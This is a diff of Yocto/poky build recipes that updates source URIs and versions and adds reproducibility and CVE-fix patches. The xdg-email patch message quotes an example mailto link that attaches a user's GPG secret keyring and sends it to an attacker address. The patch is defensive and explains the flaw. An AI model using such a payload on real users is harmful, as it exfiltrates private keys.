\ " diff --git a/poky/meta/recipes-extended/stress-ng/stress-ng/0001-Makefile-do-not-write-the-timestamp-into-compressed-.patch b/poky/meta/recipes-extended/stress-ng/stress-ng/0001-Makefile-do-not-write-the-timestamp-into-compressed-.patch new file mode 100644 index 0000000000..9dfca0441b --- /dev/null +++ b/poky/meta/recipes-extended/stress-ng/stress-ng/0001-Makefile-do-not-write-the-timestamp-into-compressed-.patch @@ -0,0 +1,26 @@ +From 2386cd8f907b379ae5cc1ce2888abef7d30e709a Mon Sep 17 00:00:00 2001 +From: Alexander Kanavin +Date: Sat, 23 Oct 2021 20:20:59 +0200 +Subject: [PATCH] Makefile: do not write the timestamp into compressed manpage. + +This helps reproducibility. + +Upstream-Status: Submitted [https://github.com/ColinIanKing/stress-ng/pull/156] +Signed-off-by: Alexander Kanavin +--- + Makefile | 2 +- + 1 file changed, 1 insertion(+), 1 deletion(-) + +diff --git a/Makefile b/Makefile +index 886018f9..f4290f9c 100644 +--- a/Makefile ++++ b/Makefile +@@ -412,7 +412,7 @@ git-commit-id.h: + $(OBJS): stress-ng.h Makefile + + stress-ng.1.gz: stress-ng.1 +- gzip -c $< > $@ ++ gzip -n -c $< > $@ + + .PHONY: dist + dist: diff --git a/poky/meta/recipes-extended/stress-ng/stress-ng_0.11.17.bb b/poky/meta/recipes-extended/stress-ng/stress-ng_0.11.17.bb index 9b987c7bde..cf94e0275b 100644 --- a/poky/meta/recipes-extended/stress-ng/stress-ng_0.11.17.bb +++ b/poky/meta/recipes-extended/stress-ng/stress-ng_0.11.17.bb @@ -5,11 +5,12 @@ HOMEPAGE = "https://kernel.ubuntu.com/~cking/stress-ng/" LICENSE = "GPLv2" LIC_FILES_CHKSUM = "file://COPYING;md5=b234ee4d69f5fce4486a80fdaf4a4263" -SRC_URI = "https://kernel.ubuntu.com/~cking/tarballs/${BPN}/${BP}.tar.xz \ +SRC_URI = "git://github.com/ColinIanKing/stress-ng.git;protocol=https;branch=master \ file://0001-Do-not-preserve-ownership-when-installing-example-jo.patch \ + file://0001-Makefile-do-not-write-the-timestamp-into-compressed-.patch \ " -SRC_URI[md5sum] = "7b89157c838f2bb4bdeba8f46e3c56ae" -SRC_URI[sha256sum] = "860291dd3a18b985b3483190a627bbede2b5c52113766c1921001b3fb4b83af0" +SRCREV = "e045bcd711178c11b7e797ef6b4c524658468596" +S = "${WORKDIR}/git" DEPENDS = "coreutils-native" diff --git a/poky/meta/recipes-extended/sysklogd/sysklogd.inc b/poky/meta/recipes-extended/sysklogd/sysklogd.inc index 8899daa1b0..e45b256bbe 100644 --- a/poky/meta/recipes-extended/sysklogd/sysklogd.inc +++ b/poky/meta/recipes-extended/sysklogd/sysklogd.inc @@ -10,7 +10,7 @@ LIC_FILES_CHKSUM = "file://LICENSE;md5=5b4be4b2549338526758ef479c040943 \ inherit update-rc.d update-alternatives systemd autotools -SRC_URI = "git://github.com/troglobit/sysklogd.git;nobranch=1 \ +SRC_URI = "git://github.com/troglobit/sysklogd.git;nobranch=1;protocol=https \ file://sysklogd \ file://0001-fix-one-rarely-reproduced-parallel-build-problem.patch \ " diff --git a/poky/meta/recipes-extended/tar/tar_1.32.bb b/poky/meta/recipes-extended/tar/tar_1.32.bb index 0fe0b801c2..db1540dbd6 100644 --- a/poky/meta/recipes-extended/tar/tar_1.32.bb +++ b/poky/meta/recipes-extended/tar/tar_1.32.bb @@ -66,5 +66,6 @@ NATIVE_PACKAGE_PATH_SUFFIX = "/${PN}" BBCLASSEXTEND = "native nativesdk" -# These are both specific to the NPM package node-tar -CVE_CHECK_WHITELIST += "CVE-2021-32803 CVE-2021-32804" +# Avoid false positives from CVEs in node-tar package +# For example CVE-2021-{32803,32804,37701,37712,37713} +CVE_PRODUCT = "gnu:tar" diff --git a/poky/meta/recipes-extended/timezone/timezone.inc b/poky/meta/recipes-extended/timezone/timezone.inc index a89560b424..e9eb249afe 100644 --- a/poky/meta/recipes-extended/timezone/timezone.inc +++ b/poky/meta/recipes-extended/timezone/timezone.inc @@ -6,7 +6,7 @@ SECTION = "base" LICENSE = "PD & BSD & BSD-3-Clause" LIC_FILES_CHKSUM = "file://LICENSE;md5=c679c9d6b02bc2757b3eaf8f53c43fba" -PV = "2021a" +PV = "2021e" SRC_URI =" http://www.iana.org/time-zones/repository/releases/tzcode${PV}.tar.gz;name=tzcode \ http://www.iana.org/time-zones/repository/releases/tzdata${PV}.tar.gz;name=tzdata \ @@ -14,5 +14,6 @@ SRC_URI =" http://www.iana.org/time-zones/repository/releases/tzcode${PV}.tar.gz UPSTREAM_CHECK_URI = "http://www.iana.org/time-zones" -SRC_URI[tzcode.sha256sum] = "eb46bfa124b5b6bd13d61a609bfde8351bd192894708d33aa06e5c1e255802d0" -SRC_URI[tzdata.sha256sum] = "39e7d2ba08c68cbaefc8de3227aab0dec2521be8042cf56855f7dc3a9fb14e08" +SRC_URI[tzcode.sha256sum] = "584666393a5424d13d27ec01183da17703273664742e049d4f62f62dab631775" +SRC_URI[tzdata.sha256sum] = "07ec42b737d0d3c6be9c337f8abb5f00554a0f9cc4fcf01a703d69403b6bb2b1" + diff --git a/poky/meta/recipes-extended/xdg-utils/xdg-utils/1f199813e0eb0246f63b54e9e154970e609575af.patch b/poky/meta/recipes-extended/xdg-utils/xdg-utils/1f199813e0eb0246f63b54e9e154970e609575af.patch new file mode 100644 index 0000000000..948b9e22e9 --- /dev/null +++ b/poky/meta/recipes-extended/xdg-utils/xdg-utils/1f199813e0eb0246f63b54e9e154970e609575af.patch @@ -0,0 +1,58 @@ +From 1f199813e0eb0246f63b54e9e154970e609575af Mon Sep 17 00:00:00 2001 +From: =?UTF-8?q?J=C3=B6rg=20Thalheim?= +Date: Tue, 18 Aug 2020 16:52:24 +0100 +Subject: [PATCH] xdg-email: remove attachment handling from mailto +MIME-Version: 1.0 +Content-Type: text/plain; charset=UTF-8 +Content-Transfer-Encoding: 8bit + +This allows attacker to extract secrets from users: + +mailto:sid@evil.com?attach=/.gnupg/secring.gpg + +See also https://bugzilla.mozilla.org/show_bug.cgi?id=1613425 +and https://gitlab.freedesktop.org/xdg/xdg-utils/-/issues/177 + +Signed-off-by: Jörg Thalheim +--- + scripts/xdg-email.in | 7 +------ + 1 file changed, 1 insertion(+), 6 deletions(-) + +Upstream-Status: Backport +CVE: CVE-2020-27748 + +diff --git a/scripts/xdg-email.in b/scripts/xdg-email.in +index 6db58ad..5d2f4f3 100644 +--- a/scripts/xdg-email.in ++++ b/scripts/xdg-email.in +@@ -32,7 +32,7 @@ _USAGE + + run_thunderbird() + { +- local THUNDERBIRD MAILTO NEWMAILTO TO CC BCC SUBJECT BODY ATTACH ++ local THUNDERBIRD MAILTO NEWMAILTO TO CC BCC SUBJECT BODY + THUNDERBIRD="$1" + MAILTO=$(echo "$2" | sed 's/^mailto://') + echo "$MAILTO" | grep -qs "^?" +@@ -48,7 +48,6 @@ run_thunderbird() + BCC=$(/bin/echo -e $(echo "$MAILTO" | grep '^bcc=' | sed 's/^bcc=//;s/%\(..\)/\\x\1/g' | awk '{ printf "%s,",$0 }')) + SUBJECT=$(echo "$MAILTO" | grep '^subject=' | tail -n 1) + BODY=$(echo "$MAILTO" | grep '^body=' | tail -n 1) +- ATTACH=$(/bin/echo -e $(echo "$MAILTO" | grep '^attach=' | sed 's/^attach=//;s/%\(..\)/\\x\1/g' | awk '{ printf "%s,",$0 }' | sed 's/,$//')) + + if [ -z "$TO" ] ; then + NEWMAILTO= +@@ -68,10 +67,6 @@ run_thunderbird() + NEWMAILTO="${NEWMAILTO},$BODY" + fi + +- if [ -n "$ATTACH" ] ; then +- NEWMAILTO="${NEWMAILTO},attachment='${ATTACH}'" +- fi +- + NEWMAILTO=$(echo "$NEWMAILTO" | sed 's/^,//') + DEBUG 1 "Running $THUNDERBIRD -compose \"$NEWMAILTO\"" + "$THUNDERBIRD" -compose "$NEWMAILTO" +-- +GitLab + diff --git a/poky/meta/recipes-extended/xdg-utils/xdg-utils_1.1.3.bb b/poky/meta/recipes-extended/xdg-utils/xdg-utils_1.1.3.bb index d371c5c28c..41b74b8598 100644 --- a/poky/meta/recipes-extended/xdg-utils/xdg-utils_1.1.3.bb +++ b/poky/meta/recipes-extended/xdg-utils/xdg-utils_1.1.3.bb @@ -20,6 +20,7 @@ LIC_FILES_CHKSUM = "file://LICENSE;md5=a5367a90934098d6b05af3b746405014" SRC_URI = "https://portland.freedesktop.org/download/${BPN}-${PV}.tar.gz \ file://0001-Reinstate-xdg-terminal.patch \ file://0001-Don-t-build-the-in-script-manual.patch \ + file://1f199813e0eb0246f63b54e9e154970e609575af.patch \ " SRC_URI[md5sum] = "902042508b626027a3709d105f0b63ff" diff --git a/poky/meta/recipes-extended/xinetd/xinetd_2.3.15.bb b/poky/meta/recipes-extended/xinetd/xinetd_2.3.15.bb index da81867115..765a34e842 100644 --- a/poky/meta/recipes-extended/xinetd/xinetd_2.3.15.bb +++ b/poky/meta/recipes-extended/xinetd/xinetd_2.3.15.bb @@ -13,7 +13,7 @@ PR = "r2" # Blacklist a bogus tag in upstream check UPSTREAM_CHECK_GITTAGREGEX = "xinetd-(?P(?!20030122).+)" -SRC_URI = "git://github.com/xinetd-org/xinetd.git;protocol=https \ +SRC_URI = "git://github.com/xinetd-org/xinetd.git;protocol=https;branch=master \ file://xinetd.init \ file://xinetd.conf \ file://xinetd.default \ diff --git a/poky/meta/recipes-gnome/gdk-pixbuf/gdk-pixbuf/CVE-2021-20240.patch b/poky/meta/recipes-gnome/gdk-pixbuf/gdk-pixbuf/CVE-2021-20240.patch new file mode 100644 index 0000000000..fe594b24bb --- /dev/null +++ b/poky/meta/recipes-gnome/gdk-pixbuf/gdk-pixbuf/CVE-2021-20240.patch @@ -0,0 +1,40 @@ +From 086e8adf4cc352cd11572f96066b001b545f354e Mon Sep 17 00:00:00 2001 +From: Emmanuele Bassi +Date: Wed, 1 Apr 2020 18:11:55 +0100 +Subject: [PATCH] Check the memset length argument + +Avoid overflows by using the checked multiplication macro for gsize. + +Fixes: #132 + +Upstream-Status: Backported [https://gitlab.gnome.org/GNOME/gdk-pixbuf/-/commit/086e8adf4cc352cd11572f96066b001b545f354e] +CVE: CVE-2021-20240 + +Signed-off-by: Changqing Li +--- + gdk-pixbuf/io-gif-animation.c | 6 +++++- + 1 file changed, 5 insertions(+), 1 deletion(-) + +diff --git a/gdk-pixbuf/io-gif-animation.c b/gdk-pixbuf/io-gif-animation.c +index c9db3c66e..49674fd2e 100644 +--- a/gdk-pixbuf/io-gif-animation.c ++++ b/gdk-pixbuf/io-gif-animation.c +@@ -412,11 +412,15 @@ gdk_pixbuf_gif_anim_iter_get_pixbuf (GdkPixbufAnimationIter *anim_iter) + + /* If no rendered frame, render the first frame */ + if (anim->last_frame == NULL) { ++ gsize len = 0; + if (anim->last_frame_data == NULL) + anim->last_frame_data = gdk_pixbuf_new (GDK_COLORSPACE_RGB, TRUE, 8, anim->width, anim->height); + if (anim->last_frame_data == NULL) + return NULL; +- memset (gdk_pixbuf_get_pixels (anim->last_frame_data), 0, gdk_pixbuf_get_rowstride (anim->last_frame_data) * anim->height); ++ if (g_size_checked_mul (&len, gdk_pixbuf_get_rowstride (anim->last_frame_data), anim->height)) ++ memset (gdk_pixbuf_get_pixels (anim->last_frame_data), 0, len); ++ else ++ return NULL; + composite_frame (anim, g_list_nth_data (anim->frames, 0)); + } + +-- +GitLab diff --git a/poky/meta/recipes-gnome/gdk-pixbuf/gdk-pixbuf_2.40.0.bb b/poky/meta/recipes-gnome/gdk-pixbuf/gdk-pixbuf_2.40.0.bb index 54861e83c6..60a04c3581 100644 --- a/poky/meta/recipes-gnome/gdk-pixbuf/gdk-pixbuf_2.40.0.bb +++ b/poky/meta/recipes-gnome/gdk-pixbuf/gdk-pixbuf_2.40.0.bb @@ -25,6 +25,7 @@ SRC_URI = "${GNOME_MIRROR}/${BPN}/${MAJ_VER}/${BPN}-${PV}.tar.xz \ file://0006-Build-thumbnailer-and-tests-also-in-cross-builds.patch \ file://missing-test-data.patch \ file://CVE-2020-29385.patch \ + file://CVE-2021-20240.patch \ " SRC_URI_append_class-target = " \ diff --git a/poky/meta/recipes-gnome/gobject-introspection/gobject-introspection_1.62.0.bb b/poky/meta/recipes-gnome/gobject-introspection/gobject-introspection_1.62.0.bb index 92b0d1d52f..0842f10ea9 100644 --- a/poky/meta/recipes-gnome/gobject-introspection/gobject-introspection_1.62.0.bb +++ b/poky/meta/recipes-gnome/gobject-introspection/gobject-introspection_1.62.0.bb @@ -102,7 +102,7 @@ EOF # from the target sysroot. cat > ${B}/g-ir-scanner-wrapper << EOF #!/bin/sh -# This prevents g-ir-scanner from writing cache data to $HOME +# This prevents g-ir-scanner from writing cache data to user's HOME dir export GI_SCANNER_DISABLE_CACHE=1 g-ir-scanner --lib-dirs-envvar=GIR_EXTRA_LIBS_PATH --use-binary-wrapper=${STAGING_BINDIR}/g-ir-scanner-qemuwrapper --use-ldd-wrapper=${STAGING_BINDIR}/g-ir-scanner-lddwrapper --add-include-path=${STAGING_DATADIR}/gir-1.0 --add-include-path=${STAGING_LIBDIR}/gir-1.0 "\$@" diff --git a/poky/meta/recipes-graphics/glew/glew/notempdir.patch b/poky/meta/recipes-graphics/glew/glew/notempdir.patch new file mode 100644 index 0000000000..8d79ce0cdf --- /dev/null +++ b/poky/meta/recipes-graphics/glew/glew/notempdir.patch @@ -0,0 +1,19 @@ +We don't use the dist-* targets and hence DIST_DIR isn't used. The current code +creates a new temp directory in /tmp/ for every invocation of make. Lets +not do that. + +Upstream-Status: Pending [a revised version would be needed for upstream] +Signed-off-by: Richard Purdie + +Index: glew-2.2.0/Makefile +=================================================================== +--- glew-2.2.0.orig/Makefile ++++ glew-2.2.0/Makefile +@@ -56,7 +56,6 @@ DIST_SRC_ZIP ?= $(shell pwd)/$(DIST_NAME + DIST_SRC_TGZ ?= $(shell pwd)/$(DIST_NAME).tgz + DIST_WIN32 ?= $(shell pwd)/$(DIST_NAME)-win32.zip + +-DIST_DIR := $(shell mktemp -d /tmp/glew.XXXXXX)/$(DIST_NAME) + + # To disable stripping of linked binaries either: + # - use STRIP= on gmake command-line diff --git a/poky/meta/recipes-graphics/glew/glew_2.2.0.bb b/poky/meta/recipes-graphics/glew/glew_2.2.0.bb index 92b6083648..d7a26a3438 100644 --- a/poky/meta/recipes-graphics/glew/glew_2.2.0.bb +++ b/poky/meta/recipes-graphics/glew/glew_2.2.0.bb @@ -7,6 +7,7 @@ LIC_FILES_CHKSUM = "file://LICENSE.txt;md5=2ac251558de685c6b9478d89be3149c2" SRC_URI = "${SOURCEFORGE_MIRROR}/project/glew/glew/${PV}/glew-${PV}.tgz \ file://0001-Fix-build-race-in-Makefile.patch \ + file://notempdir.patch \ file://no-strip.patch" SRC_URI[md5sum] = "3579164bccaef09e36c0af7f4fd5c7c7" diff --git a/poky/meta/recipes-graphics/libfakekey/libfakekey_git.bb b/poky/meta/recipes-graphics/libfakekey/libfakekey_git.bb index ab6f5ac9ed..33ea6fe5a9 100644 --- a/poky/meta/recipes-graphics/libfakekey/libfakekey_git.bb +++ b/poky/meta/recipes-graphics/libfakekey/libfakekey_git.bb @@ -13,7 +13,7 @@ SECTION = "x11/wm" SRCREV = "7ad885912efb2131e80914e964d5e635b0d07b40" PV = "0.3+git${SRCPV}" -SRC_URI = "git://git.yoctoproject.org/${BPN}" +SRC_URI = "git://git.yoctoproject.org/${BPN};branch=master" S = "${WORKDIR}/git" diff --git a/poky/meta/recipes-graphics/libmatchbox/libmatchbox_1.12.bb b/poky/meta/recipes-graphics/libmatchbox/libmatchbox_1.12.bb index 1a31677978..06bd682823 100644 --- a/poky/meta/recipes-graphics/libmatchbox/libmatchbox_1.12.bb +++ b/poky/meta/recipes-graphics/libmatchbox/libmatchbox_1.12.bb @@ -17,7 +17,7 @@ DEPENDS = "virtual/libx11 libxext" #SRCREV for 1.12 SRCREV = "e846ee434f8e23d9db38af13c523f791495e0e87" -SRC_URI = "git://git.yoctoproject.org/${BPN}" +SRC_URI = "git://git.yoctoproject.org/${BPN};branch=master" S = "${WORKDIR}/git" diff --git a/poky/meta/recipes-graphics/libva/libva-utils_2.6.0.bb b/poky/meta/recipes-graphics/libva/libva-utils_2.6.0.bb index 03b38027a1..f14ed0f52b 100644 --- a/poky/meta/recipes-graphics/libva/libva-utils_2.6.0.bb +++ b/poky/meta/recipes-graphics/libva/libva-utils_2.6.0.bb @@ -14,7 +14,7 @@ SECTION = "x11" LICENSE = "MIT" LIC_FILES_CHKSUM = "file://COPYING;md5=b148fc8adf19dc9aec17cf9cd29a9a5e" -SRC_URI = "git://github.com/intel/libva-utils.git;branch=v2.6-branch" +SRC_URI = "git://github.com/intel/libva-utils.git;branch=v2.6-branch;protocol=https" SRCREV = "8ea1eba433dcbceb0e5dcb54b8e3f984987f7a17" S = "${WORKDIR}/git" diff --git a/poky/meta/recipes-graphics/matchbox-wm/matchbox-wm_1.2.2.bb b/poky/meta/recipes-graphics/matchbox-wm/matchbox-wm_1.2.2.bb index a08eb252ce..3ea67d09d6 100644 --- a/poky/meta/recipes-graphics/matchbox-wm/matchbox-wm_1.2.2.bb +++ b/poky/meta/recipes-graphics/matchbox-wm/matchbox-wm_1.2.2.bb @@ -12,7 +12,7 @@ DEPENDS = "libmatchbox virtual/libx11 libxext libxrender startup-notification ex # SRCREV tagged 1.2.2 SRCREV = "27da947e7fbdf9659f7e5bd1e92af92af6c03970" -SRC_URI = "git://git.yoctoproject.org/matchbox-window-manager \ +SRC_URI = "git://git.yoctoproject.org/matchbox-window-manager;branch=master \ file://0001-Fix-build-with-gcc-10.patch \ file://kbdconfig" diff --git a/poky/meta/recipes-graphics/mesa/mesa.inc b/poky/meta/recipes-graphics/mesa/mesa.inc index a1bf878b1a..bfab19e773 100644 --- a/poky/meta/recipes-graphics/mesa/mesa.inc +++ b/poky/meta/recipes-graphics/mesa/mesa.inc @@ -231,7 +231,7 @@ python mesa_populate_packages() { import re dri_drivers_root = oe.path.join(d.getVar('PKGD'), d.getVar('libdir'), "dri") if os.path.isdir(dri_drivers_root): - dri_pkgs = os.listdir(dri_drivers_root) + dri_pkgs = sorted(os.listdir(dri_drivers_root)) lib_name = d.expand("${MLPREFIX}mesa-megadriver") for p in dri_pkgs: m = re.match(r'^(.*)_dri\.so$', p) diff --git a/poky/meta/recipes-graphics/mx/mx-1.0_1.4.7.bb b/poky/meta/recipes-graphics/mx/mx-1.0_1.4.7.bb index 58a6997ffe..88101b5dcc 100644 --- a/poky/meta/recipes-graphics/mx/mx-1.0_1.4.7.bb +++ b/poky/meta/recipes-graphics/mx/mx-1.0_1.4.7.bb @@ -7,7 +7,7 @@ PV = "1.4.7+git${SRCPV}" # Exclude x.99.x versions from upstream checks UPSTREAM_CHECK_GITTAGREGEX = "(?P^\d+(\.(?!99)\d+)+)" -SRC_URI = "git://github.com/clutter-project/mx.git;branch=mx-1.4 \ +SRC_URI = "git://github.com/clutter-project/mx.git;branch=mx-1.4;protocol=https \ file://fix-test-includes.patch \ " S = "${WORKDIR}/git" diff --git a/poky/meta/recipes-graphics/piglit/piglit/0001-Add-a-missing-include-for-htobe32-definition.patch b/poky/meta/recipes-graphics/piglit/piglit/0001-Add-a-missing-include-for-htobe32-definition.patch new file mode 100644 index 0000000000..caa48e088d --- /dev/null +++ b/poky/meta/recipes-graphics/piglit/piglit/0001-Add-a-missing-include-for-htobe32-definition.patch @@ -0,0 +1,27 @@ +From d623e9797b7ee9b3739a8a4afe1a01f7e03754aa Mon Sep 17 00:00:00 2001 +From: Alexander Kanavin +Date: Sun, 1 Nov 2020 20:08:49 +0000 +Subject: [PATCH] Add a missing include for htobe32 definition + +Upstream-Status: Pending +Signed-off-by: Alexander Kanavin +--- + tests/spec/nv_copy_depth_to_color/nv_copy_depth_to_color.c | 2 ++ + 1 file changed, 2 insertions(+) + +diff --git a/tests/spec/nv_copy_depth_to_color/nv_copy_depth_to_color.c b/tests/spec/nv_copy_depth_to_color/nv_copy_depth_to_color.c +index 5f45e0c23..c755ee29a 100644 +--- a/tests/spec/nv_copy_depth_to_color/nv_copy_depth_to_color.c ++++ b/tests/spec/nv_copy_depth_to_color/nv_copy_depth_to_color.c +@@ -34,6 +34,8 @@ + + #include "piglit-util-gl.h" + ++#include ++ + #define IMAGE_WIDTH 60 + #define IMAGE_HEIGHT 60 + +-- +2.17.1 + diff --git a/poky/meta/recipes-graphics/piglit/piglit/0001-framework-profile.py-make-test-lists-reproducible.patch b/poky/meta/recipes-graphics/piglit/piglit/0001-framework-profile.py-make-test-lists-reproducible.patch new file mode 100644 index 0000000000..cc9482c047 --- /dev/null +++ b/poky/meta/recipes-graphics/piglit/piglit/0001-framework-profile.py-make-test-lists-reproducible.patch @@ -0,0 +1,31 @@ +From 9086d42df1f3134bafcfe33ff16db7bbb9d9a0fd Mon Sep 17 00:00:00 2001 +From: Alexander Kanavin +Date: Mon, 30 Nov 2020 23:08:22 +0000 +Subject: [PATCH] framework/profile.py: make test lists reproducible + +These are created with os.walk, which yields different +order depending on where it's run. + +Upstream-Status: Pending +Signed-off-by: Alexander Kanavin +--- + framework/profile.py | 6 +++++- + 1 file changed, 5 insertions(+), 1 deletion(-) + +diff --git a/framework/profile.py b/framework/profile.py +index c210e535e..9b5d51d68 100644 +--- a/framework/profile.py ++++ b/framework/profile.py +@@ -528,7 +528,11 @@ class TestProfile(object): + else: + opts[n] = self.test_list[n] + else: +- opts = self.test_list # pylint: disable=redefined-variable-type ++ opts = collections.OrderedDict() ++ test_keys = list(self.test_list.keys()) ++ test_keys.sort() ++ for k in test_keys: ++ opts[k] = self.test_list[k] + + for k, v in self.filters.run(opts.items()): + yield k, v diff --git a/poky/meta/recipes-graphics/piglit/piglit/0001-generated_tests-gen_tcs-tes_input_tests.py-do-not-ha.patch b/poky/meta/recipes-graphics/piglit/piglit/0001-generated_tests-gen_tcs-tes_input_tests.py-do-not-ha.patch new file mode 100644 index 0000000000..8704f98500 --- /dev/null +++ b/poky/meta/recipes-graphics/piglit/piglit/0001-generated_tests-gen_tcs-tes_input_tests.py-do-not-ha.patch @@ -0,0 +1,44 @@ +From 1b23539aece156f6fe0789cb988f22e5915228f6 Mon Sep 17 00:00:00 2001 +From: Alexander Kanavin +Date: Tue, 10 Nov 2020 17:12:32 +0000 +Subject: [PATCH 1/2] generated_tests/gen_tcs/tes_input_tests.py: do not + hardcode the full binary path + +This helps reproducibility. + +Upstream-Status: Pending +Signed-off-by: Alexander Kanavin +--- + generated_tests/gen_tcs_input_tests.py | 2 +- + generated_tests/gen_tes_input_tests.py | 2 +- + 2 files changed, 2 insertions(+), 2 deletions(-) + +diff --git a/generated_tests/gen_tcs_input_tests.py b/generated_tests/gen_tcs_input_tests.py +index face4f19a..e36671af4 100644 +--- a/generated_tests/gen_tcs_input_tests.py ++++ b/generated_tests/gen_tcs_input_tests.py +@@ -272,7 +272,7 @@ class Test(object): + relative probe rgb (0.75, 0.75) (0.0, 1.0, 0.0) + """) + +- test = test.format(self=self, generator_command=" ".join(sys.argv)) ++ test = test.format(self=self, generator_command="generated_tests/gen_tcs_input_tests.py") + + filename = self.filename() + dirname = os.path.dirname(filename) +diff --git a/generated_tests/gen_tes_input_tests.py b/generated_tests/gen_tes_input_tests.py +index 3d847b5cc..954840b20 100644 +--- a/generated_tests/gen_tes_input_tests.py ++++ b/generated_tests/gen_tes_input_tests.py +@@ -301,7 +301,7 @@ class Test(object): + relative probe rgb (0.75, 0.75) (0.0, 1.0, 0.0) + """) + +- test = test.format(self=self, generator_command=" ".join(sys.argv)) ++ test = test.format(self=self, generator_command="generated_tests/gen_tes_input_tests.py") + + filename = self.filename() + dirname = os.path.dirname(filename) +-- +2.17.1 + diff --git a/poky/meta/recipes-graphics/piglit/piglit/0001-serializer.py-make-.gz-files-reproducible.patch b/poky/meta/recipes-graphics/piglit/piglit/0001-serializer.py-make-.gz-files-reproducible.patch new file mode 100644 index 0000000000..2efba6f866 --- /dev/null +++ b/poky/meta/recipes-graphics/piglit/piglit/0001-serializer.py-make-.gz-files-reproducible.patch @@ -0,0 +1,30 @@ +From 1919bb7f4072d73dcbb64d0e06eff5b04529c3db Mon Sep 17 00:00:00 2001 +From: Alexander Kanavin +Date: Mon, 16 Nov 2020 18:01:02 +0000 +Subject: [PATCH] serializer.py: make .gz files reproducible + +.gz format contains mtime of the compressed data, and +SOURCE_DATE_EPOCH is the standard way to make it reproducuble. + +Upstream-Status: Pending +Signed-off-by: Alexander Kanavin +--- + tests/serializer.py | 5 ++++- + 1 file changed, 4 insertions(+), 1 deletion(-) + +diff --git a/tests/serializer.py b/tests/serializer.py +index bd14bc3db..bc5b45d7f 100644 +--- a/tests/serializer.py ++++ b/tests/serializer.py +@@ -138,7 +138,10 @@ def serializer(name, profile, outfile): + et.SubElement(env, 'env', name=k, value=v) + + tree = et.ElementTree(root) +- with gzip.open(outfile, 'wb') as f: ++ reproducible_mtime = None ++ if 'SOURCE_DATE_EPOCH' in os.environ: ++ reproducible_mtime=os.environ['SOURCE_DATE_EPOCH'] ++ with gzip.GzipFile(outfile, 'wb', mtime=reproducible_mtime) as f: + tree.write(f, encoding='utf-8', xml_declaration=True) + + diff --git a/poky/meta/recipes-graphics/piglit/piglit/0001-tests-shader.py-sort-the-file-list-before-working-on.patch b/poky/meta/recipes-graphics/piglit/piglit/0001-tests-shader.py-sort-the-file-list-before-working-on.patch new file mode 100644 index 0000000000..8321be8490 --- /dev/null +++ b/poky/meta/recipes-graphics/piglit/piglit/0001-tests-shader.py-sort-the-file-list-before-working-on.patch @@ -0,0 +1,28 @@ +From 5bf89c6a314952313b2b762fff0d5501fe57ac53 Mon Sep 17 00:00:00 2001 +From: Alexander Kanavin +Date: Wed, 2 Dec 2020 21:21:52 +0000 +Subject: [PATCH] tests/shader.py: sort the file list before working on it + +This allows later xml output to be reproducible. + +Upstream-Status: Pending +Signed-off-by: Alexander Kanavin +--- + tests/shader.py | 4 +++- + 1 file changed, 3 insertions(+), 1 deletion(-) + +diff --git a/tests/shader.py b/tests/shader.py +index 849273660..e6e65d1ba 100644 +--- a/tests/shader.py ++++ b/tests/shader.py +@@ -52,7 +52,9 @@ for basedir in [TESTS_DIR, GENERATED_TESTS_DIR]: + for group, files in shader_tests.items(): + assert group not in profile.test_list, 'duplicate group: {}'.format(group) + +- # We'll end up with a list of tuples, split that into two lists ++ # This makes the xml output reproducible, as os.walk() order is random ++ files.sort() ++ # We'll end up with a list of tuples, split that into two list + files, installedfiles = list(zip(*files)) + files = list(files) + installedfiles = list(installedfiles) diff --git a/poky/meta/recipes-graphics/piglit/piglit/0002-tests-util-piglit-shader.c-do-not-hardcode-build-pat.patch b/poky/meta/recipes-graphics/piglit/piglit/0002-tests-util-piglit-shader.c-do-not-hardcode-build-pat.patch new file mode 100644 index 0000000000..16c7c5c803 --- /dev/null +++ b/poky/meta/recipes-graphics/piglit/piglit/0002-tests-util-piglit-shader.c-do-not-hardcode-build-pat.patch @@ -0,0 +1,30 @@ +From 1c67250308a92d4991ed05d9d240090ab84accae Mon Sep 17 00:00:00 2001 +From: Alexander Kanavin +Date: Tue, 10 Nov 2020 17:13:50 +0000 +Subject: [PATCH 2/2] tests/util/piglit-shader.c: do not hardcode build path + into target binary + +This helps reproducibilty. + +Upstream-Status: Inappropriate [oe-core specific] +Signed-off-by: Alexander Kanavin +--- + tests/util/piglit-shader.c | 2 +- + 1 file changed, 1 insertion(+), 1 deletion(-) + +diff --git a/tests/util/piglit-shader.c b/tests/util/piglit-shader.c +index 4fd68d21e..c9ea8295e 100644 +--- a/tests/util/piglit-shader.c ++++ b/tests/util/piglit-shader.c +@@ -73,7 +73,7 @@ piglit_compile_shader(GLenum target, const char *filename) + + source_dir = getenv("PIGLIT_SOURCE_DIR"); + if (source_dir == NULL) { +- source_dir = SOURCE_DIR; ++ source_dir = "."; + } + + snprintf(filename_with_path, FILENAME_MAX - 1, +-- +2.17.1 + diff --git a/poky/meta/recipes-graphics/piglit/piglit_git.bb b/poky/meta/recipes-graphics/piglit/piglit_git.bb index 4229412554..9897ef1575 100644 --- a/poky/meta/recipes-graphics/piglit/piglit_git.bb +++ b/poky/meta/recipes-graphics/piglit/piglit_git.bb @@ -6,13 +6,19 @@ BUGTRACKER = "https://gitlab.freedesktop.org/mesa/piglit/-/issues" LICENSE = "MIT & LGPLv2+ & GPLv3 & GPLv2+ & BSD-3-Clause" LIC_FILES_CHKSUM = "file://COPYING;md5=b2beded7103a3d8a442a2a0391d607b0" -SRC_URI = "git://gitlab.freedesktop.org/mesa/piglit.git;protocol=https \ +SRC_URI = "git://gitlab.freedesktop.org/mesa/piglit.git;protocol=https;branch=main \ file://0001-cmake-install-bash-completions-in-the-right-place.patch \ file://0001-cmake-use-proper-WAYLAND_INCLUDE_DIRS-variable.patch \ + file://0001-Add-a-missing-include-for-htobe32-definition.patch \ + file://0001-generated_tests-gen_tcs-tes_input_tests.py-do-not-ha.patch \ + file://0002-tests-util-piglit-shader.c-do-not-hardcode-build-pat.patch \ + file://0001-serializer.py-make-.gz-files-reproducible.patch \ + file://0001-framework-profile.py-make-test-lists-reproducible.patch \ + file://0001-tests-shader.py-sort-the-file-list-before-working-on.patch \ " UPSTREAM_CHECK_COMMITS = "1" -SRCREV = "6126c2d4e476c7770d216ffa1932c10e2a5a7813" +SRCREV = "83bc56abf2686e2cd9024a152e121ca4aa524985" # (when PV goes above 1.0 remove the trailing r) PV = "1.0+gitr${SRCPV}" @@ -37,7 +43,9 @@ do_compile[dirs] =+ "${B}/temp/" PACKAGECONFIG ??= "${@bb.utils.filter('DISTRO_FEATURES', 'x11', d)}" PACKAGECONFIG[freeglut] = 